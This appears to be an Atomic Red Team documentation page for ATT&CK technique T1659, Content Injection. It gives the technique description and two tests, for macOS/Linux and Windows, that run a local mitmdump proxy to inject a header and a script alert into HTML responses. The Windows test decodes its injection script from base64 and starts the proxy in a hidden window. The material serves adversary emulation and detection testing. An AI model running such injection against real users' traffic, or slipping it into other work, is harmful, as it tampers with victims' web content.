logo
SlackReddit

T1659

Content Injection

Description from ATT&CK

Adversaries may gain access and continuously communicate with victims by injecting malicious content into systems through online network traffic. Rather than luring victims to malicious payloads hosted on a compromised website (i.e., Drive-by Target followed by Drive-by Compromise), adversaries may initially access victims through compromised data-transfer channels where they can manipulate traffic and/or inject their own content. These compromised online network channels may also be used to deliver additional payloads (i.e., Ingress Tool Transfer) and other data to already compromised systems.(Citation: ESET MoustachedBouncer)

Adversaries may inject content to victim systems in various ways, including:

  • From the middle, where the adversary is in-between legitimate online client-server communications (Note: this is similar but distinct from Adversary-in-the-Middle, which describes AiTM activity solely within an enterprise environment) (Citation: Kaspersky Encyclopedia MiTM)
  • From the side, where malicious content is injected and races to the client as a fake response to requests of a legitimate online server (Citation: Kaspersky ManOnTheSide)

Content injection is often the result of compromised upstream communication channels, for example at the level of an internet service provider (ISP) as is the case with "lawful interception."(Citation: Kaspersky ManOnTheSide)(Citation: ESET MoustachedBouncer)(Citation: EFF China GitHub Attack)

Source

Atomic Tests

Atomic Test #1: MITM Proxy Injection

Start mitmdump and verify injected header and HTML content.

Supported Platforms: macOS, Linux

auto_generated_guid: 9b360eaf-c778-4f07-a6e7-895c4f01ac1c

Attack Commands: Run with bash!

curl -skI --proxy http://127.0.0.1:8080 http://example.com > /tmp/curl_out.txt
grep "X-Atomic" /tmp/curl_out.txt || (cat /tmp/curl_out.txt && exit 1)
curl -sk --proxy http://127.0.0.1:8080 http://example.com > /tmp/atomic_t1659_page.html
grep -q "Atomic T1659 Injection" /tmp/atomic_t1659_page.html || (head -20 /tmp/atomic_t1659_page.html; exit 1)

Cleanup Commands

rm -rf /tmp/atomic_t1659_inject.py
rm -rf /tmp/atomic_t1659.log
rm -rf /tmp/curl_out.txt
rm -rf /tmp/atomic_t1659_page.html
pkill -f mitmdump || true

Dependencies: Run with bash!

Description: python3 must be installed
Check Prereq Commands
command -v python3
Get Prereq Commands
brew install python3 || (sudo apt-get update && sudo apt-get install -y python3) || sudo yum install -y python3
Description: curl must be installed
Check Prereq Commands
command -v curl
Get Prereq Commands
brew install curl || (sudo apt-get update && sudo apt-get install -y curl) || sudo yum install -y curl
Description: pipx must be installed
Check Prereq Commands
pipx --version
Get Prereq Commands
brew install pipx || (sudo apt-get update && sudo apt-get install -y pipx) || sudo yum install -y pipx
Description: mitmproxy must be installed
Check Prereq Commands
pipx list | grep mitmproxy
Get Prereq Commands
pipx install mitmproxy || brew install mitmproxy
Description: mitmdump must be running on port 8080
Check Prereq Commands
lsof -i tcp:8080 | grep mitmdump
Get Prereq Commands
printf "from mitmproxy import http\ndef response(flow: http.HTTPFlow):\n    if 'text/html' in flow.response.headers.get('content-type',''):\n        flow.response.headers['X-Atomic']='T1659'\n        flow.response.text = flow.response.text.replace('</body>', '<script>alert(\"Atomic T1659 Injection\")</script></body>')" > /tmp/atomic_t1659_inject.py
($HOME/.local/bin/mitmdump -s /tmp/atomic_t1659_inject.py -p 8080 > /tmp/atomic_t1659.log 2>&1 &)
sleep 5
lsof -i tcp:8080 | grep mitmdump || (cat /tmp/atomic_t1659.log; exit 1)

Atomic Test #2: MITM Proxy Injection (Windows)

Start mitmdump proxy with injection script in the background.

Supported Platforms: Windows

auto_generated_guid: dcc2ca85-a21c-43a4-acc7-7314d4e5891c

Attack Commands: Run with powershell!

curl.exe -skI --proxy http://127.0.0.1:8080 http://example.com | Tee-Object -FilePath "$env:TEMP\curl_out.txt"
if (-not (Select-String -Path "$env:TEMP\curl_out.txt" -Pattern "X-Atomic")) { Write-Error "Header not found"; exit 1 }
$OutPath = "$env:TEMP\atomic_t1659_page.html"
curl.exe -sk --proxy http://127.0.0.1:8080 http://example.com | Out-File -FilePath $OutPath -Encoding utf8
$Content = Get-Content -Path $OutPath -Raw
if ($Content -notmatch "Atomic T1659 Injection") { exit 1 }

Cleanup Commands

Stop-Process -Name "mitmdump" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\atomic_t1659_inject.py" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\atomic_t1659.log" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\curl_out.txt" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\atomic_t1659_page.html" -ErrorAction SilentlyContinue

Dependencies: Run with powershell!

Description: Python must be installed
Check Prereq Commands
if (Get-Command python -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 }
Get Prereq Commands
winget install --id Python.Python.3 -e
Description: curl must be installed
Check Prereq Commands
if (Get-Command curl.exe -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 }
Get Prereq Commands
winget install --id cURL.cURL -e
Description: mitmproxy must be installed and in PATH
Check Prereq Commands
if (Get-Command mitmdump -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 }
Get Prereq Commands
python -m pip install mitmproxy
Description: mitmdump must be running on port 8080
Check Prereq Commands
if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue | Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name -like "*mitmdump*" }) { exit 0 } else { exit 1 }
Get Prereq Commands
$code = 'ZnJvbSBtaXRtcHJveHkgaW1wb3J0IGh0dHANCmRlZiByZXNwb25zZShmbG93OiBodHRwLkhUVFBGbG93KToNCiAgICBpZiAidGV4dC9odG1sIiBpbiBmbG93LnJlc3BvbnNlLmhlYWRlcnMuZ2V0KCJjb250ZW50LXR5cGUiLCIiKToNCiAgICAgICAgZmxvdy5yZXNwb25zZS5oZWFkZXJzWyJYLUF0b21pYyJdPSJUMTY1OSINCiAgICAgICAgZmxvdy5yZXNwb25zZS50ZXh0ID0gZmxvdy5yZXNwb25zZS50ZXh0LnJlcGxhY2UoIjwvYm9keT4iLCAiPHNjcmlwdD5hbGVydCgnQXRvbWljIFQxNjU5IEluamVjdGlvbicpPC9zY3JpcHQ+PC9ib2R5PiIp'
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($code)) | Out-File -FilePath "$env:TEMP\atomic_t1659_inject.py" -Encoding ascii
Start-Process -FilePath "mitmdump" -ArgumentList @("-s", "$env:TEMP\atomic_t1659_inject.py", "-p", "8080") -RedirectStandardOutput "$env:TEMP\atomic_t1659.log" -RedirectStandardError "$env:TEMP\atomic_t1659.log" -WindowStyle Hidden
Start-Sleep -Seconds 5
if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue | Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name -like "*mitmdump*" }) { exit 0 } else { Get-Content "$env:TEMP\atomic_t1659.log"; exit 1 }

Atomic test(s) for this technique last updated: 2026-04-20 02:21:05 UTC

T1654

Log Enumeration

On this page

Description from ATT&CK
Atomic Tests
Atomic Test #1: MITM Proxy Injection
Atomic Test #2: MITM Proxy Injection (Windows)